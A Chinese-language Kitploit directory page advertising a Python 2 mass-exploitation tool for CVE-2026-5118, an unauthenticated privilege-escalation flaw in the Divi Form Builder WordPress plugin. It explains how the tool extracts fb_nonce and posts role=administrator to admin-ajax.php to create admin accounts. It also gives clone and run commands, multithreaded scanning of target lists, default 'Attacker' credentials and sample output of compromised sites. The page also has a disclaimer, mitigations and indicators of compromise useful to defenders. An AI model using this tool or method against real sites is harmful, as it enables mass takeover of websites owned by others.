Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2026-5118 — CVE-2026-5118 – 针对 Divi WordPress 插件的 Python2 批量利用工具,通过 admin-ajax.php 进行未认证管理员注册。多线程扫描器,支持 nonce 提取。 | Kitploit
工具/GitHubGitHub/jenderal92/cve-2026-5118
权限提升漏洞扫描器漏洞利用Web应用程序漏洞利用渗透测试身份验证
GitHubjenderal92/cve-2026-5118

CVE-2026-5118

CVE-2026-5118 – 针对 Divi WordPress 插件的 Python2 批量利用工具,通过 admin-ajax.php 进行未认证管理员注册。多线程扫描器,支持 nonce 提取。

查看仓库
2个月前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

Divi Form Builder <= 5.1.2 - 通过 'role' 的未认证权限提升

⚠️ 警告:此工具仅供授权渗透测试和安全研究使用。
未经授权访问计算机系统是违法的。仅可在您拥有或已获得明确书面许可的系统上使用。 更多免责声明:您可以在 Jenderal92 的封面上查看。请点击此处 !!!

概述

此 Python 2 脚本利用了 Divi WordPress 插件(及相关 Divi 表单)中的权限提升漏洞。它可以通过以下方式远程注册一个管理员账户:

  • 从目标的 Divi 注册表单中提取 fb_nonce。
  • 向 /wp-admin/admin-ajax.php 发送带有 role=administrator 的精心构造的 multipart 请求。
  • 自动检测是否成功并保存被攻陷的管理员 URL。

功能特性

  • ✅ 多线程(默认 20 个线程),用于快速扫描。
  • ✅ 自动 URL 规范化 – 若缺少协议,则自动添加 https://。
  • ✅ Nonce 提取,使用多种正则表达式模式(内联 JavaScript、隐藏输入、de_fb_obj)。
  • ✅ multipart/form-data 请求,模拟合法的浏览器提交。
  • ✅ 成功检测,通过响应关键字(success、user_id、user created 等)。
  • ✅ 结果保存到 results.txt,格式为:
    https://target.com/wp-admin/ | username | password

环境要求

  • Python 2.7(使用 urllib2、Queue、threading – 未经修改无法兼容 Python 3)
  • 目标 URL 列表(每行一个)

安装

root@kitploit:~
git clone https://github.com/Jenderal92/CVE-2026-5118.git
cd CVE-2026-5118
chmod +x CVE-2026-5118.py

使用方法

1. 准备目标列表

创建一个文本文件,每行包含一个域名或 URL。您可以省略 http:// / https:// – 脚本默认会添加 https://。

示例 targets.txt:

root@kitploit:~
example.com
https://vulnerable-site.com
http://127.0.0.1/wordpress
test-site.org

2. 运行漏洞利用

root@kitploit:~
python CVE-2026-5118.py targets.txt

3. 输出示例

root@kitploit:~
[*] Total targets : 4
[*] Credentials   : Attacker / Attacker@123#+
[*] Threads       : 20
[*] Output file   : results.txt

[1] Checking https://example.com
[+] SUCCESS! https://example.com/wp-admin/

[2] Checking https://vulnerable-site.com
[+] SUCCESS! https://vulnerable-site.com/wp-admin/

[3] Checking http://192.168.1.100/wordpress
[3] FAILED  http://192.168.1.100/wordpress

[4] Checking https://test-site.org
[4] FAILED  https://test-site.org

=== DONE ===
Successful: 2 / 4

4. 结果文件(results.txt)

root@kitploit:~
https://example.com/wp-admin/|Attacker|Attacker@123#+
https://vulnerable-site.com/wp-admin/|Attacker|Attacker@123#+

配置

您可以在脚本顶部自定义以下变量:

工作原理

  1. 规范化 URL – 若未提供协议,则自动添加 https://。
  2. 提取 nonce – 获取首页(或注册页面)并使用正则表达式模式搜索 fb_nonce。
  3. 构建请求 – 构造一个包含以下内容的 multipart/form-data POST 请求:
    • action=de_fb_ajax_submit_ajax_handler
    • fb_nonce=<extracted nonce>
    • role=administrator
    • de_fb_user_login / user_login
    • de_fb_user_pass / user_pass
    • de_fb_user_email / user_email
  4. 发送到 admin‑ajax.php – 如果响应中包含任何成功关键字,则将目标标记为存在漏洞。
  5. 保存结果 – 将管理员 URL 和凭据写入输出文件。

检测与缓解

对于使用 Divi 的 WordPress 管理员:

  • 将 Divi 及所有相关插件更新到最新版本。
  • 如无必要,禁用公开注册功能。
  • 使用安全插件(Wordfence、Sucuri)监控 admin-ajax.php 请求。
  • 在所有注册表单上实施 reCAPTCHA。
  • 切勿公开带有可被篡改的 role 参数的注册表单。

入侵指标(IOC):

  • 带有 action=de_fb_ajax_submit_ajax_handler 的异常 admin-ajax.php 请求
  • 出现用户名可疑(例如 Attacker)的新管理员用户
  • 访问日志中包含 role=administrator 的 POST 数据

法律免责声明

本软件仅用于教育目的和经授权的安全测试。作者不对因使用本工具而造成的滥用或损害承担任何责任。使用本软件即表示您同意:

  • 在测试前获得系统所有者的书面许可。
  • 遵守所有适用法律(CFAA、Computer Misuse Act、UU ITE 等)。
  • 立即删除所获得的任何未经授权的访问权限。
  • 以负责任的方式向受影响的厂商报告漏洞。

违反这些条款可能导致刑事起诉、罚款或监禁。

贡献

欢迎提交拉取请求以进行改进(Python 3 移植、更好的 nonce 提取、额外的注册路径检测)。请保留道德免责声明。

下载工具
变量默认值描述
DEFAULT_USERNAMEAttacker要注册的用户名
DEFAULT_PASSWORDAttacker@123#+密码(包含特殊字符的强密码)
DEFAULT_EMAIL[email protected]电子邮件地址
THREAD_COUNT20并发线程数
OUTPUT_FILEresults.txt保存成功目标的文件